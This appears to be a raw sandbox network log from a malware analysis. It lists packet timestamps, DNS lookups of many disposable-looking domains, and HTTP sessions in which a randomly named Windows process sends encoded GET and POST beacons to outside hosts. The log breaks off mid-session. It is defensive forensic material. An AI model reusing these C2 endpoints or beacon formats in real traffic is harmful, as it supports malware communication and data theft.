                                                                              Jan 14, 2025 12:02:25.282694101 CET804947767.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:25.282727957 CET804947767.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:25.282758951 CET804947767.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:25.282793045 CET804947767.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:25.282821894 CET804947767.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:25.282855988 CET804947767.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:25.282890081 CET804947767.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:25.282919884 CET4947780192.168.2.567.223.117.189
                                                                              Jan 14, 2025 12:02:25.282919884 CET4947780192.168.2.567.223.117.189
                                                                              Jan 14, 2025 12:02:25.282919884 CET4947780192.168.2.567.223.117.189
                                                                              Jan 14, 2025 12:02:25.282919884 CET4947780192.168.2.567.223.117.189
                                                                              Jan 14, 2025 12:02:25.282963991 CET4947780192.168.2.567.223.117.189
                                                                              Jan 14, 2025 12:02:25.287842035 CET804947767.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:25.287878990 CET804947767.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:25.287914038 CET804947767.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:25.287930965 CET4947780192.168.2.567.223.117.189
                                                                              Jan 14, 2025 12:02:25.287966013 CET804947767.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:25.288014889 CET4947780192.168.2.567.223.117.189
                                                                              Jan 14, 2025 12:02:25.288186073 CET804947767.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:25.328841925 CET4947780192.168.2.567.223.117.189
                                                                              Jan 14, 2025 12:02:25.369223118 CET804947767.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:25.369261980 CET804947767.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:25.369277954 CET804947767.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:25.369292974 CET804947767.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:25.369308949 CET804947767.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:25.369324923 CET804947767.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:25.369489908 CET4947780192.168.2.567.223.117.189
                                                                              Jan 14, 2025 12:02:25.369489908 CET4947780192.168.2.567.223.117.189
                                                                              Jan 14, 2025 12:02:25.369586945 CET804947767.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:25.369604111 CET804947767.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:25.369618893 CET804947767.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:25.369663000 CET4947780192.168.2.567.223.117.189
                                                                              Jan 14, 2025 12:02:25.369694948 CET804947767.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:25.369710922 CET804947767.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:25.369725943 CET804947767.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:25.369741917 CET4947780192.168.2.567.223.117.189
                                                                              Jan 14, 2025 12:02:25.369780064 CET4947780192.168.2.567.223.117.189
                                                                              Jan 14, 2025 12:02:25.370583057 CET804947767.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:25.370599985 CET804947767.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:25.370619059 CET804947767.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:25.370676994 CET4947780192.168.2.567.223.117.189
                                                                              Jan 14, 2025 12:02:26.219722986 CET4947780192.168.2.567.223.117.189
                                                                              Jan 14, 2025 12:02:27.237931013 CET4947880192.168.2.567.223.117.189
                                                                              Jan 14, 2025 12:02:27.243096113 CET804947867.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:27.243308067 CET4947880192.168.2.567.223.117.189
                                                                              Jan 14, 2025 12:02:27.254400969 CET4947880192.168.2.567.223.117.189
                                                                              Jan 14, 2025 12:02:27.259545088 CET804947867.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:27.851429939 CET804947867.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:27.851459980 CET804947867.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:27.851474047 CET804947867.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:27.851488113 CET804947867.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:27.851502895 CET804947867.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:27.851517916 CET804947867.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:27.851526976 CET804947867.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:27.851541996 CET804947867.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:27.851556063 CET804947867.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:27.851569891 CET804947867.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:27.851604939 CET4947880192.168.2.567.223.117.189
                                                                              Jan 14, 2025 12:02:27.851757050 CET4947880192.168.2.567.223.117.189
                                                                              Jan 14, 2025 12:02:27.856693029 CET804947867.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:27.856744051 CET804947867.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:27.856781960 CET804947867.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:27.856812000 CET804947867.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:27.856827021 CET4947880192.168.2.567.223.117.189
                                                                              Jan 14, 2025 12:02:27.856884956 CET4947880192.168.2.567.223.117.189
                                                                              Jan 14, 2025 12:02:27.942130089 CET804947867.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:27.942203999 CET804947867.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:27.942241907 CET804947867.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:27.942270041 CET4947880192.168.2.567.223.117.189
                                                                              Jan 14, 2025 12:02:27.942276955 CET804947867.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:27.942311049 CET804947867.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:27.942346096 CET804947867.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:27.942370892 CET4947880192.168.2.567.223.117.189
                                                                              Jan 14, 2025 12:02:27.942378998 CET804947867.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:27.942409992 CET4947880192.168.2.567.223.117.189
                                                                              Jan 14, 2025 12:02:27.942411900 CET804947867.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:27.942447901 CET804947867.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:27.942462921 CET4947880192.168.2.567.223.117.189
                                                                              Jan 14, 2025 12:02:27.943059921 CET804947867.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:27.943111897 CET4947880192.168.2.567.223.117.189
                                                                              Jan 14, 2025 12:02:27.943113089 CET804947867.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:27.943147898 CET804947867.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:27.943180084 CET804947867.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:27.943190098 CET4947880192.168.2.567.223.117.189
                                                                              Jan 14, 2025 12:02:27.943213940 CET804947867.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:27.943249941 CET804947867.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:27.943255901 CET4947880192.168.2.567.223.117.189
                                                                              Jan 14, 2025 12:02:27.943896055 CET804947867.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:27.943949938 CET4947880192.168.2.567.223.117.189
                                                                              Jan 14, 2025 12:02:27.947396040 CET4947880192.168.2.567.223.117.189
                                                                              Jan 14, 2025 12:02:27.952281952 CET804947867.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:33.206173897 CET4947980192.168.2.5136.243.64.147
                                                                              Jan 14, 2025 12:02:33.211229086 CET8049479136.243.64.147192.168.2.5
                                                                              Jan 14, 2025 12:02:33.211374044 CET4947980192.168.2.5136.243.64.147
                                                                              Jan 14, 2025 12:02:33.226027966 CET4947980192.168.2.5136.243.64.147
                                                                              Jan 14, 2025 12:02:33.231002092 CET8049479136.243.64.147192.168.2.5
                                                                              Jan 14, 2025 12:02:33.863503933 CET8049479136.243.64.147192.168.2.5
                                                                              Jan 14, 2025 12:02:33.863564014 CET8049479136.243.64.147192.168.2.5
                                                                              Jan 14, 2025 12:02:33.863631010 CET4947980192.168.2.5136.243.64.147
                                                                              Jan 14, 2025 12:02:34.735357046 CET4947980192.168.2.5136.243.64.147
                                                                              Jan 14, 2025 12:02:35.753344059 CET4948080192.168.2.5136.243.64.147
                                                                              Jan 14, 2025 12:02:35.759422064 CET8049480136.243.64.147192.168.2.5
                                                                              Jan 14, 2025 12:02:35.759530067 CET4948080192.168.2.5136.243.64.147
                                                                              Jan 14, 2025 12:02:35.774318933 CET4948080192.168.2.5136.243.64.147
                                                                              Jan 14, 2025 12:02:35.779396057 CET8049480136.243.64.147192.168.2.5
                                                                              Jan 14, 2025 12:02:36.394908905 CET8049480136.243.64.147192.168.2.5
                                                                              Jan 14, 2025 12:02:36.394929886 CET8049480136.243.64.147192.168.2.5
                                                                              Jan 14, 2025 12:02:36.394998074 CET4948080192.168.2.5136.243.64.147
                                                                              Jan 14, 2025 12:02:37.281934023 CET4948080192.168.2.5136.243.64.147
                                                                              Jan 14, 2025 12:02:38.304424047 CET4948180192.168.2.5136.243.64.147
                                                                              Jan 14, 2025 12:02:38.310708046 CET8049481136.243.64.147192.168.2.5
                                                                              Jan 14, 2025 12:02:38.310904026 CET4948180192.168.2.5136.243.64.147
                                                                              Jan 14, 2025 12:02:38.321916103 CET4948180192.168.2.5136.243.64.147
                                                                              Jan 14, 2025 12:02:38.326783895 CET8049481136.243.64.147192.168.2.5
                                                                              Jan 14, 2025 12:02:38.326925039 CET8049481136.243.64.147192.168.2.5
                                                                              Jan 14, 2025 12:02:38.957910061 CET8049481136.243.64.147192.168.2.5
                                                                              Jan 14, 2025 12:02:38.958175898 CET8049481136.243.64.147192.168.2.5
                                                                              Jan 14, 2025 12:02:38.958247900 CET4948180192.168.2.5136.243.64.147
                                                                              Jan 14, 2025 12:02:39.828999996 CET4948180192.168.2.5136.243.64.147
                                                                              Jan 14, 2025 12:02:40.847032070 CET4948280192.168.2.5136.243.64.147
                                                                              Jan 14, 2025 12:02:40.852185011 CET8049482136.243.64.147192.168.2.5
                                                                              Jan 14, 2025 12:02:40.852262020 CET4948280192.168.2.5136.243.64.147
                                                                              Jan 14, 2025 12:02:40.859766006 CET4948280192.168.2.5136.243.64.147
                                                                              Jan 14, 2025 12:02:40.864550114 CET8049482136.243.64.147192.168.2.5
                                                                              Jan 14, 2025 12:02:41.509357929 CET8049482136.243.64.147192.168.2.5
                                                                              Jan 14, 2025 12:02:41.509447098 CET8049482136.243.64.147192.168.2.5
                                                                              Jan 14, 2025 12:02:41.509608030 CET4948280192.168.2.5136.243.64.147
                                                                              Jan 14, 2025 12:02:41.513300896 CET4948280192.168.2.5136.243.64.147
                                                                              Jan 14, 2025 12:02:41.519288063 CET8049482136.243.64.147192.168.2.5
                                                                              Jan 14, 2025 12:02:47.084389925 CET4948380192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:47.089477062 CET8049483134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:02:47.089600086 CET4948380192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:47.101634026 CET4948380192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:47.106496096 CET8049483134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:02:47.992187023 CET8049483134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:02:47.992269993 CET8049483134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:02:47.992350101 CET4948380192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:48.610086918 CET4948380192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:49.635632992 CET4948480192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:49.641153097 CET8049484134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:02:49.641253948 CET4948480192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:49.653376102 CET4948480192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:49.658317089 CET8049484134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:02:50.518213987 CET8049484134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:02:50.518290997 CET8049484134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:02:50.518498898 CET4948480192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:51.156887054 CET4948480192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:52.174710035 CET4948580192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:52.179969072 CET8049485134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:02:52.180078983 CET4948580192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:52.192111015 CET4948580192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:52.197000027 CET8049485134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:02:52.197236061 CET8049485134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:02:53.252290964 CET8049485134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:02:53.252367973 CET8049485134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:02:53.252409935 CET8049485134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:02:53.252429962 CET4948580192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:53.252470016 CET4948580192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:53.703900099 CET4948580192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:54.721962929 CET4948680192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:54.727180958 CET8049486134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:02:54.727329969 CET4948680192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:54.734879971 CET4948680192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:54.739830017 CET8049486134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:02:55.619914055 CET8049486134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:02:55.619946957 CET8049486134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:02:55.620110035 CET4948680192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:55.623383999 CET4948680192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:55.628372908 CET8049486134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:03:08.821048975 CET4948780192.168.2.547.83.1.90
                                                                              Jan 14, 2025 12:03:08.825923920 CET804948747.83.1.90192.168.2.5
                                                                              Jan 14, 2025 12:03:08.826011896 CET4948780192.168.2.547.83.1.90
                                                                              Jan 14, 2025 12:03:08.838386059 CET4948780192.168.2.547.83.1.90
                                                                              Jan 14, 2025 12:03:08.844727039 CET804948747.83.1.90192.168.2.5
                                                                              Jan 14, 2025 12:03:10.344486952 CET4948780192.168.2.547.83.1.90
                                                                              Jan 14, 2025 12:03:10.350960016 CET804948747.83.1.90192.168.2.5
                                                                              Jan 14, 2025 12:03:10.351070881 CET4948780192.168.2.547.83.1.90
                                                                              Jan 14, 2025 12:03:11.362644911 CET4948880192.168.2.547.83.1.90
                                                                              Jan 14, 2025 12:03:11.367638111 CET804948847.83.1.90192.168.2.5
                                                                              Jan 14, 2025 12:03:11.367712021 CET4948880192.168.2.547.83.1.90
                                                                              Jan 14, 2025 12:03:11.380228043 CET4948880192.168.2.547.83.1.90
                                                                              Jan 14, 2025 12:03:11.385034084 CET804948847.83.1.90192.168.2.5
                                                                              Jan 14, 2025 12:03:12.829078913 CET804948847.83.1.90192.168.2.5
                                                                              Jan 14, 2025 12:03:12.829128981 CET804948847.83.1.90192.168.2.5
                                                                              Jan 14, 2025 12:03:12.829243898 CET4948880192.168.2.547.83.1.90
                                                                              Jan 14, 2025 12:03:12.891500950 CET4948880192.168.2.547.83.1.90
                                                                              Jan 14, 2025 12:03:13.911031008 CET4948980192.168.2.547.83.1.90
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 14, 2025 12:01:19.555974960 CET | 192.168.2.5 | 1.1.1.1 | 0xf0f4 | Standard query (0) | 18.31.95.13.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Jan 14, 2025 12:01:41.714757919 CET | 192.168.2.5 | 1.1.1.1 | 0xc240 | Standard query (0) | www.zucchini.pro | A (IP address) | IN (0x0001) | false
Jan 14, 2025 12:01:57.317643881 CET | 192.168.2.5 | 1.1.1.1 | 0x11f8 | Standard query (0) | www.vh5g.sbs | A (IP address) | IN (0x0001) | false
Jan 14, 2025 12:02:11.088268042 CET | 192.168.2.5 | 1.1.1.1 | 0x2dad | Standard query (0) | www.v89ey584d.shop | A (IP address) | IN (0x0001) | false
Jan 14, 2025 12:02:19.253741980 CET | 192.168.2.5 | 1.1.1.1 | 0x49ab | Standard query (0) | www.actionhub.live | A (IP address) | IN (0x0001) | false
Jan 14, 2025 12:02:32.958010912 CET | 192.168.2.5 | 1.1.1.1 | 0xcdcd | Standard query (0) | www.100millionjobs.africa | A (IP address) | IN (0x0001) | false
Jan 14, 2025 12:02:46.519309998 CET | 192.168.2.5 | 1.1.1.1 | 0x9cfd | Standard query (0) | www.x3kwqc5tye4vl90y.top | A (IP address) | IN (0x0001) | false
Jan 14, 2025 12:03:00.630786896 CET | 192.168.2.5 | 1.1.1.1 | 0xe537 | Standard query (0) | www.hwak.live | A (IP address) | IN (0x0001) | false
Jan 14, 2025 12:03:08.722414017 CET | 192.168.2.5 | 1.1.1.1 | 0xddf9 | Standard query (0) | www.qzsazi.info | A (IP address) | IN (0x0001) | false
Jan 14, 2025 12:03:23.097570896 CET | 192.168.2.5 | 1.1.1.1 | 0xad06 | Standard query (0) | www.truckgoway.info | A (IP address) | IN (0x0001) | false
Jan 14, 2025 12:03:36.269834995 CET | 192.168.2.5 | 1.1.1.1 | 0xd6b9 | Standard query (0) | www.aloezhealthcare.info | A (IP address) | IN (0x0001) | false
Jan 14, 2025 12:03:49.566143036 CET | 192.168.2.5 | 1.1.1.1 | 0xa84b | Standard query (0) | www.letsbookcruise.xyz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 14, 2025 12:01:19.563612938 CET | 1.1.1.1 | 192.168.2.5 | 0xf0f4 | Name error (3) | 18.31.95.13.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Jan 14, 2025 12:01:41.782213926 CET | 1.1.1.1 | 192.168.2.5 | 0xc240 | No error (0) | www.zucchini.pro |  | 199.59.243.228 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 12:01:57.329682112 CET | 1.1.1.1 | 192.168.2.5 | 0x11f8 | No error (0) | www.vh5g.sbs |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 12:01:57.329682112 CET | 1.1.1.1 | 192.168.2.5 | 0x11f8 | No error (0) | www.vh5g.sbs |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 12:02:11.096929073 CET | 1.1.1.1 | 192.168.2.5 | 0x2dad | Name error (3) | www.v89ey584d.shop | none | none | A (IP address) | IN (0x0001) | false
Jan 14, 2025 12:02:19.439596891 CET | 1.1.1.1 | 192.168.2.5 | 0x49ab | No error (0) | www.actionhub.live |  | 67.223.117.189 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 12:02:33.203530073 CET | 1.1.1.1 | 192.168.2.5 | 0xcdcd | No error (0) | www.100millionjobs.africa | 100millionjobs.africa |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 14, 2025 12:02:33.203530073 CET | 1.1.1.1 | 192.168.2.5 | 0xcdcd | No error (0) | 100millionjobs.africa |  | 136.243.64.147 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 12:02:47.081890106 CET | 1.1.1.1 | 192.168.2.5 | 0x9cfd | No error (0) | www.x3kwqc5tye4vl90y.top | zcdn.8383dns.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 14, 2025 12:02:47.081890106 CET | 1.1.1.1 | 192.168.2.5 | 0x9cfd | No error (0) | zcdn.8383dns.com |  | 134.122.133.80 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 12:02:47.081890106 CET | 1.1.1.1 | 192.168.2.5 | 0x9cfd | No error (0) | zcdn.8383dns.com |  | 134.122.135.48 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 12:03:00.641879082 CET | 1.1.1.1 | 192.168.2.5 | 0xe537 | Name error (3) | www.hwak.live | none | none | A (IP address) | IN (0x0001) | false
Jan 14, 2025 12:03:08.818295956 CET | 1.1.1.1 | 192.168.2.5 | 0xddf9 | No error (0) | www.qzsazi.info |  | 47.83.1.90 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 12:03:23.150932074 CET | 1.1.1.1 | 192.168.2.5 | 0xad06 | No error (0) | www.truckgoway.info | truckgoway.info |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 14, 2025 12:03:23.150932074 CET | 1.1.1.1 | 192.168.2.5 | 0xad06 | No error (0) | truckgoway.info |  | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 12:03:36.284084082 CET | 1.1.1.1 | 192.168.2.5 | 0xd6b9 | No error (0) | www.aloezhealthcare.info |  | 213.171.195.105 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 12:03:49.664401054 CET | 1.1.1.1 | 192.168.2.5 | 0xa84b | No error (0) | www.letsbookcruise.xyz | redirect.natrocdn.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 14, 2025 12:03:49.664401054 CET | 1.1.1.1 | 192.168.2.5 | 0xa84b | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 14, 2025 12:03:49.664401054 CET | 1.1.1.1 | 192.168.2.5 | 0xa84b | No error (0) | natroredirect.natrocdn.com |  | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49424 | 199.59.243.228 | 80 | 2520 | C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe

Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 12:01:41.803833961 CET | 394 | OUT | GET /tqv2/?Gxq=1VbhX6&t0A=mw5EMDe107YJTqugc68gmErc1Hs+Bqgx5FZV14wN+wWnYz/1vECwz9qX0523rVAHVbCkyePm1aNLCJN6m48zyzkbcjQAczVPINQnyJ55BFcYg7GslxzSN34k4b/zmS+IfA== HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.zucchini.pro
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
Jan 14, 2025 12:01:42.268702984 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                              date: Tue, 14 Jan 2025 11:01:41 GMT
                                                                              content-type: text/html; charset=utf-8
                                                                              content-length: 1478
                                                                              x-request-id: f005172f-db04-4f88-a4c0-d012ee8b913e
                                                                              cache-control: no-store, max-age=0
                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                              vary: sec-ch-prefers-color-scheme
                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_jxAM+Lgs+VBKywkLfQvupmI9uWWrgexGR4qV4PbWhSTg3zd7oS5t14Cjq/xePlRMUyVF+Zp4JxLCSdWWOldQLw==
                                                                              set-cookie: parking_session=f005172f-db04-4f88-a4c0-d012ee8b913e; expires=Tue, 14 Jan 2025 11:16:42 GMT; path=/
                                                                              connection: close
                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_jxAM+Lgs+VBKywkLfQvupmI9uWWrgexGR4qV4PbWhSTg3zd7oS5t14Cjq/xePlRMUyVF+Zp4JxLCSdWWOldQLw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                              Jan 14, 2025 12:01:42.268728018 CET | 931 | IN
                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjAwNTE3MmYtZGIwNC00Zjg4LWE0YzAtZDAxMmVlOGI5MTNlIiwicGFnZV90aW1lIjoxNzM2ODUyNT


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              1 | 192.168.2.5 | 49471 | 188.114.97.3 | 80 | 2520 | C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 14, 2025 12:01:57.356580019 CET | 644 | OUT | POST /54nj/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 204
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.vh5g.sbs
                                                                              Origin: http://www.vh5g.sbs
                                                                              Referer: http://www.vh5g.sbs/54nj/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Ascii: t0A=uS1c8tUP40fu5T9yd6pBzbBogEyYTQ2cKhyin5guZJVz6hF4HAv7Lv4t2NtcddJ1sA+9iYBlDvPhnOdVLs98vsItB3ZfZ/mEAmWl/gjXlrdmd8k6Kx0fo28yEWroC0oiCecDtHDns18w4UQqA/BbeVRIa2CwxhUUNtNp3TcmFDrLsgO+LSj/7r88QGZB9UGaWmUT7QU=
                                                                              Jan 14, 2025 12:01:58.115289927 CET | 1236 | IN | HTTP/1.1 301 Moved Permanently
                                                                              Date: Tue, 14 Jan 2025 11:01:57 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Location: http://www.vh5g.sbs/
                                                                              X-XSS-Protection: 1; mode=block
                                                                              X-Content-Type-Options: nosniff
                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                              Content-Security-Policy: default-src 'self' http: https: ws: wss: data: blob: 'unsafe-inline'; frame-ancestors 'self';
                                                                              Permissions-Policy: interest-cohort=()
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3W8hyW0ibEgXhbJkcLzv5sybR8YfaWZvQrmYdUfDqX0HJSicg3q6CtsGLfbbFhU81Ayn6nYrsIi9Iy7lrTYrR%2BkUrdptMDw9yKqDK%2F4qfY3uR1j86%2BtDNi8R727an5Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 901d218c0887c413-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1415&min_rtt=1415&rtt_var=707&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=644&delivery_rate=0&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></ht
                                                                              Jan 14, 2025 12:01:58.115307093 CET | 12 | IN | Data Raw: 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: ml>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              2 | 192.168.2.5 | 49472 | 188.114.97.3 | 80 | 2520 | C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 14, 2025 12:01:59.895302057 CET | 664 | OUT | POST /54nj/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
